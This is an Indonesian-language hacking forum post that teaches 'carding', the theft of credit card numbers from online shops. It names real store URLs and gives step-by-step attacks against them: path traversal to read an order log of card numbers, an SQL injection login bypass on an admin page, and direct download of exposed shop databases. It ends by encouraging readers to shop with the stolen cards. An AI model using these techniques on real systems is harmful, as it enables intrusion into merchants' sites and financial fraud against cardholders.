/-------------Thread started by z3rox--------------\
/--------------thx to Cyber_spy--------------\
sebelomnya gw g prnah nyoba trik ne...
tapi yah buat nambah2 ilmu silakan coba ea..
ntar klw berhasil bagi2 ke gw..
buat yg lom tw carding....
mati aja lu..
gak usah ngaku hacker klw g tw carding..ane aja yg noobs tw..hahhaa...
Lets Begin – Just For Share!
CGI Store Log
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=
3. Masukkan file ini di belakang situs tadi :
../admin/files/order.log
Misal nya http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
4. Maka yang keluar di situs itu adalah nomor CC (credit card).
Admin Take Over
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.partsupply.in.th/shopadmin.asp
2. Langkah selanjutnya gunakan teknik SQL Injection
user : ‘or”=’
pass : ‘or”=’
3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.
Database Downloadable
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.youngsliquors.com/winestore/shopadmin.asp
2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/
3. Masukkan file ini di belakang situs tadi :
shopdbtest.asp
Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp
4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :
xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211
5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :
http://www.youngsliquors.com/winestore/shopping300.mdb
6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.
Metacart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.imagexpres.com/metacart/moreinfo.asp
2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/
3. Masukkan file ini di belakang situs tadi :
database/metacart.mdb
Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb
6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.
PDshopPro Shopping Cart
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.marktwainbooks.com/shop/category.asp?catid=4
2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com
3. Masukkan file ini di belakang situs tadi :
admin/dbsetup.asp
Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp
4. Maka yang keluar di situs target adalah :
Your Database Type :
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ’setup’ Table Found!
Database permissions OK!
5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :
http://www.marktwainbooks.com/data/pdshoppro.mdb
6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.
cara blanjanya kyak biasa aja kok...